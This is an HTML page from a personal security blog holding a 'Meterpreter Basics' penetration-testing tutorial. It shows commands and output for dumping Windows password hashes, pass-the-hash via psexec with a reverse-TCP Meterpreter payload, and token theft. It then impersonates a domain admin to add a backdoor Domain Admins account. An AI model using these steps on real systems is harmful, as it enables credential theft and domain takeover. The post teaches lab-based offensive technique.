<!doctype html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Meterpreter," />








  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.1" />






<meta name="description" content="Let’s know something basic before we start. You can skip the following if you are familiar with them.">
<meta name="keywords" content="Meterpreter">
<meta property="og:type" content="article">
<meta property="og:title" content="Meterpreter Basics">
<meta property="og:url" content="/2017-12-03-Meterpreter-Basics/index.html">
<meta property="og:site_name" content="Ꭰ&#39;s security blog">
<meta property="og:description" content="Let’s know something basic before we start. You can skip the following if you are familiar with them.">
<meta property="og:updated_time" content="2017-12-05T14:24:46.545Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Meterpreter Basics">
<meta name="twitter:description" content="Let’s know something basic before we start. You can skip the following if you are familiar with them.">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017-12-03-Meterpreter-Basics/"/>





  <title>Meterpreter Basics | Ꭰ's security blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ca5988953450620ca8c294ff5c390a4a";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ꭰ's security blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/2017-12-03-Meterpreter-Basics/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ꭰ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/header.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ꭰ's security blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Meterpreter Basics</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-12-03T14:29:27+08:00">
                2017-12-03
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Penetration-Test/" itemprop="url" rel="index">
                    <span itemprop="name">Penetration Test</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017-12-03-Meterpreter-Basics/" class="leancloud_visitors" data-flag-title="Meterpreter Basics">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Let’s know something basic before we start. You can skip the following if you are familiar with them.</p>
<a id="more"></a>
<h4 id="Terminology"><a href="#Terminology" class="headerlink" title="Terminology"></a>Terminology</h4><ul>
<li><strong>Exploit</strong> (<em>An exploit is the means by which an attacker, or pen tester for that matterk takes advantage of a flaw within a system, an application, or a service.</em>)</li>
<li><strong>Payload</strong> (<em>A payload is code that we want the system to execute and that is to be selected and delivered by the Framework</em>) For example, <em>a reverse shell</em> is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a <em>bind shell</em> is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect.</li>
<li><strong>Shellcode</strong> (<em>Shellcode</em> is a set of instructions used as a payload when exploitation occurs.)</li>
<li><strong>Module</strong> (A <em>module</em> in the context of this book is a piece of software that can be used by the Metasploit Framework)</li>
<li><strong>Listener</strong> (A <em>Listener</em> is a component within Metasploit that waits for an incoming connection of some sort.)</li>
<li><strong>Resource Files</strong> (<em>Resource files</em> are script files that automate commands within msfconsole. They contain a list of commands that are executed from msfconsole and run sequentially) For example,  <em>msfconsole -r filename.rc</em> </li>
</ul>
<h4 id="Hash-Dump"><a href="#Hash-Dump" class="headerlink" title="Hash Dump"></a>Hash Dump</h4><p>If we exploit a windows machine in the penetration test, the next step is how to get the administrative privileges. Here are some tips.</p>
<p>Try to dump the usernames and passwords. Because the <em>module</em> priv is integrated into the <em>meterpreter</em> . So what you need to do is just type the chars <em>hashdump</em>. You will see the following. </p>
<p><em>Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</em></p>
<p>Remember that the hash value starts with <em>aad3b435</em> is simply an empty or null hash value — a placeholder for an empty string. Besides that we should know that we must run as <strong>SYSTEM</strong> to get around the registry restrictions and dump the protected the selected <strong>SAM(Security Account Manager)</strong> storage that contains Windows usernames and passwords.</p>
<p>What should I do after I got the hash value? Of course, you can use the rainbow table to crack the hash password. We can pass the hash value to login if we can’t crack the hash value just like the normal logon. </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">use windows/smb/psexec</div><div class="line">set PAYLOAD windows/meterpreter/reverse_tcp</div><div class="line">set LHOST 192.168.33.129</div><div class="line">set LPORT 443</div><div class="line">set RHOST 192.168.33.130</div><div class="line">set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</div><div class="line">exploit</div></pre></td></tr></table></figure>
<h4 id="Get-System"><a href="#Get-System" class="headerlink" title="Get System"></a>Get System</h4><p>The easiest way to escalate privilege is use the command <code>getsystem</code> which has been integrated into the <em>meterpreter</em>. </p>
<h4 id="Token-Impersonation"><a href="#Token-Impersonation" class="headerlink" title="Token Impersonation"></a>Token Impersonation</h4><p><em>Token impersonation</em> is very beneficial for penetration tests and can be one of Meterpreter’s most powerful features. We check the running process at the first with the command <code>ps</code>.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">meterpreter &gt; ps</div><div class="line"></div><div class="line">Process list</div><div class="line">============</div><div class="line"></div><div class="line">PID      Name               Arch   Session   User                    Path</div><div class="line">---      ----               ----   -------   ----                    ----</div><div class="line">4        System             x86    0         NT AUTHORITY\SYSTEM     </div><div class="line">380      cmd.exe            x86    0         SNEAKS.IN\ihazdomainadmin \System\</div><div class="line"></div><div class="line">meterpreter &gt;</div></pre></td></tr></table></figure>
<p>Next, we can impersonate the token by <em>steal_token pid</em> command as shown below.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">meterperter &gt; steal_token 380</div><div class="line">Stolen token with username: SNEAKS.IN\ihazdomainadmin</div><div class="line">meterperter &gt;getuid</div><div class="line">Server username: SNEAKS.IN\ihazdomainadmin</div></pre></td></tr></table></figure>
<p>Sometimes, the <em>ps</em> may not list a running process running as a <em>domain administrator</em>. We can leverage <em>incognito</em> to list available tokens on the system as well. When performing a penetration test, we should check the output of both <em>ps</em> and <em>incognito</em> to because the results may vary.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">meterpreter &gt; use incognito</div><div class="line">Loading extension incognito...Success.</div><div class="line">meterpreter &gt; list_tokens -u</div><div class="line"></div><div class="line">Delegation Tokens Available</div><div class="line">========================================</div><div class="line">NT AUTHORITY\SYSTEM</div><div class="line">Window Manager\DWM-1</div><div class="line">Window Manager\DWM-2</div><div class="line"></div><div class="line">Impersonation Tokens Available</div><div class="line">========================================</div><div class="line">NT AUTHORITY\LOCAL SERVICE</div><div class="line">NT AUTHORITY\NETWORK SERVICE</div></pre></td></tr></table></figure>
<p>Now we can impersonate the accounts list above and add a user account to the domain server.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">meterpreter &gt; impersonate_token SNEAKS.IN\\ihazdomainadmin</div><div class="line">[+] Delegation token available</div><div class="line">[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin</div><div class="line">meterpreter &gt; add_user omgcompromised p@55w0rd! -h 192.168.33.50</div><div class="line">[*] Attepting to add user omgcompromised to host 192.168.33.50</div><div class="line">[+] Successfully added user</div><div class="line">meterpreter &gt; add_group_user &quot;Domain Admins&quot; omgcompromised -h 192.168.33.50</div><div class="line">[*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50</div><div class="line">[+] Successfully added user to group</div></pre></td></tr></table></figure>
<p>Happy Weekend.</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Meterpreter/" rel="tag"># Meterpreter</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017-12-02-The-Summary-of-the-absolute-baics-of-penetration-/" rel="next" title="The Summary of the absolute baics of penetration testing">
                <i class="fa fa-chevron-left"></i> The Summary of the absolute baics of penetration testing
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017-12-03-Windows-Powershell-backdoor/" rel="prev" title="Windows Powershell Backdoor -- Timing Task">
                Windows Powershell Backdoor -- Timing Task <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/header.png"
               alt="Ꭰ" />
          <p class="site-author-name" itemprop="name">Ꭰ</p>
           
              <p class="site-description motion-element" itemprop="description">a lazy person. me</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">31</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.fangheart.top/" title="FangHeart" target="_blank">FangHeart</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnblogs.com/lcamry" title="Icamry" target="_blank">Icamry</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Terminology"><span class="nav-number">1.</span> <span class="nav-text">Terminology</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Hash-Dump"><span class="nav-number">2.</span> <span class="nav-text">Hash Dump</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Get-System"><span class="nav-number">3.</span> <span class="nav-text">Get System</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Token-Impersonation"><span class="nav-number">4.</span> <span class="nav-text">Token Impersonation</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ꭰ</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4uBSvV1VfS66JnxARLfv7BLu-gzGzoHsz", "0bxJ6KeAL6WiGATTp6QW4FpN");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
